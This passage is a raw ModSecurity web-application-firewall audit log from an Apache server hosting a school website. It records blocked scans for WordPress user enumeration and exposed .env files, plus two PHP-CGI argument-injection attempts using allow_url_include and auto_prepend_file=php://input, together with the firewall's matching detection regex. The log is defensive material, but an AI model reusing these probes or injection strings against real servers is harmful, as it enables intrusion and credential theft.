EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747746477527774 3382 (- - -) Stopwatch2: 1747746477527774 3382; combined=1445, p1=458, p2=950, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c298861-Z-- --9b6b0777-A-- [20/May/2025:20:21:25 +0700] aCyB1YKffmi-VC_l8kRraAAAAAc 103.236.140.4 49738 103.236.140.4 8181 --9b6b0777-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.199.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.199.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9b6b0777-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b6b0777-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747747285519825 3175 (- - -) Stopwatch2: 1747747285519825 3175; combined=1390, p1=451, p2=905, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b6b0777-Z-- --93276735-A-- [20/May/2025:21:32:08 +0700] aCySaMXP1sKBAOnOfYNWPAAAAMQ 103.236.140.4 53388 103.236.140.4 8181 --93276735-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.154.4.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.154.4.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --93276735-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93276735-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747751528789813 3392 (- - -) Stopwatch2: 1747751528789813 3392; combined=1675, p1=547, p2=1101, p3=0, p4=0, p5=27, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93276735-Z-- --f1b54514-A-- [20/May/2025:21:55:26 +0700] aCyX3sXP1sKBAOnOfYNcfQAAAMM 103.236.140.4 52604 103.236.140.4 8181 --f1b54514-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 161.97.153.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 161.97.153.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Accept-Charset: utf-8 --f1b54514-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1b54514-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747752926024247 1811 (- - -) Stopwatch2: 1747752926024247 1811; combined=453, p1=412, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1b54514-Z-- --a74b6107-A-- [20/May/2025:22:10:40 +0700] aCybcIKffmi-VC_l8kR6rwAAABg 103.236.140.4 43494 103.236.140.4 8181 --a74b6107-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.101.239.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.101.239.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a74b6107-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a74b6107-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747753840184281 3069 (- - -) Stopwatch2: 1747753840184281 3069; combined=1325, p1=475, p2=821, p3=0, p4=0, p5=29, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a74b6107-Z-- --47dc3a4e-A-- [20/May/2025:22:30:37 +0700] aCygHW2BM6ll8T8hTXvKAwAAAEU 103.236.140.4 41488 103.236.140.4 8181 --47dc3a4e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --47dc3a4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47dc3a4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747755037896922 841 (- - -) Stopwatch2: 1747755037896922 841; combined=381, p1=345, p2=0, p3=0, p4=0, p5=36, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47dc3a4e-Z-- --501fa920-A-- [20/May/2025:22:57:23 +0700] aCymY4Kffmi-VC_l8kSIAwAAABc 103.236.140.4 50682 103.236.140.4 8181 --501fa920-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.23.167.200 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.23.167.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; BBB100-1 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36 Accept-Charset: utf-8 --501fa920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --501fa920-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747756643356976 800 (- - -) Stopwatch2: 1747756643356976 800; combined=345, p1=305, p2=0, p3=0, p4=0, p5=39, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --501fa920-Z-- --c588c716-A-- [20/May/2025:23:05:01 +0700] aCyoLcXP1sKBAOnOfYNx2QAAANc 103.236.140.4 34502 103.236.140.4 8181 --c588c716-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.205.46.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.205.46.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c588c716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c588c716-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747757101649032 3906 (- - -) Stopwatch2: 1747757101649032 3906; combined=1885, p1=627, p2=1221, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c588c716-Z-- --b622b053-A-- [20/May/2025:23:08:37 +0700] aCypBW2BM6ll8T8hTXvdjwAAAE8 103.236.140.4 35628 103.236.140.4 8181 --b622b053-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 218.250.231.191 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 218.250.231.191 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b622b053-C-- --b622b053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b622b053-E-- --b622b053-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747757317401933 4557 (- - -) Stopwatch2: 1747757317401933 4557; combined=3332, p1=540, p2=2751, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b622b053-Z-- --6aec1863-A-- [20/May/2025:23:15:31 +0700] aCyqo22BM6ll8T8hTXvhkAAAAFQ 103.236.140.4 42140 103.236.140.4 8181 --6aec1863-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.183.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.183.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6aec1863-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6aec1863-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747757731728428 2828 (- - -) Stopwatch2: 1747757731728428 2828; combined=1288, p1=411, p2=839, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6aec1863-Z-- --77d2371d-A-- [20/May/2025:23:16:23 +0700] aCyq122BM6ll8T8hTXviKQAAAEQ 103.236.140.4 43158 103.236.140.4 8181 --77d2371d-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --77d2371d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77d2371d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747757783845244 10270 (- - -) Stopwatch2: 1747757783845244 10270; combined=19113, p1=355, p2=0, p3=0, p4=0, p5=9397, sr=122, sw=0, l=0, gc=9361 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77d2371d-Z-- --9d09aa53-A-- [20/May/2025:23:51:07 +0700] aCyy-8XP1sKBAOnOfYNzSQAAANc 103.236.140.4 44378 103.236.140.4 8181 --9d09aa53-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.229.96.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.229.96.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9d09aa53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d09aa53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747759867988812 3215 (- - -) Stopwatch2: 1747759867988812 3215; combined=1336, p1=463, p2=841, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d09aa53-Z-- --4c8fc53d-A-- [20/May/2025:23:54:28 +0700] aCyzxG2BM6ll8T8hTXvi8gAAAFE 103.236.140.4 44418 103.236.140.4 8181 --4c8fc53d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.74.19.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.74.19.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4c8fc53d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8fc53d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747760068092622 3187 (- - -) Stopwatch2: 1747760068092622 3187; combined=1464, p1=508, p2=923, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8fc53d-Z-- --17ed1117-A-- [20/May/2025:23:57:51 +0700] aCy0j8XP1sKBAOnOfYNzUQAAAMM 103.236.140.4 44426 103.236.140.4 8181 --17ed1117-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --17ed1117-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17ed1117-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747760271917155 3437 (- - -) Stopwatch2: 1747760271917155 3437; combined=1479, p1=471, p2=978, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17ed1117-Z-- --31adc10b-A-- [21/May/2025:00:44:47 +0700] aCy_j22BM6ll8T8hTXvjEAAAAEI 103.236.140.4 44626 103.236.140.4 8181 --31adc10b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.10.156.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.10.156.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --31adc10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31adc10b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747763087533712 2913 (- - -) Stopwatch2: 1747763087533712 2913; combined=1227, p1=412, p2=786, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31adc10b-Z-- --c3dc7d01-A-- [21/May/2025:00:48:50 +0700] aCzAgsXP1sKBAOnOfYNzZQAAANQ 103.236.140.4 44652 103.236.140.4 8181 --c3dc7d01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 195.36.22.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.36.22.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c3dc7d01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3dc7d01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747763330101965 2685 (- - -) Stopwatch2: 1747763330101965 2685; combined=1127, p1=386, p2=714, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3dc7d01-Z-- --ecacb539-A-- [21/May/2025:01:24:03 +0700] aCzIw4Kffmi-VC_l8kSNVgAAAAQ 103.236.140.4 49280 103.236.140.4 8181 --ecacb539-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --ecacb539-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecacb539-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747765443483839 815 (- - -) Stopwatch2: 1747765443483839 815; combined=320, p1=282, p2=0, p3=0, p4=0, p5=37, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecacb539-Z-- --4f570e3f-A-- [21/May/2025:01:57:43 +0700] aCzQp4Kffmi-VC_l8kSNagAAAAU 103.236.140.4 49402 103.236.140.4 8181 --4f570e3f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 50.7.40.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 50.7.40.241 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --4f570e3f-C-- --4f570e3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f570e3f-E-- --4f570e3f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747767463919188 5136 (- - -) Stopwatch2: 1747767463919188 5136; combined=3271, p1=492, p2=2741, p3=0, p4=0, p5=38, sr=80, sw=0, l=0, gc=0 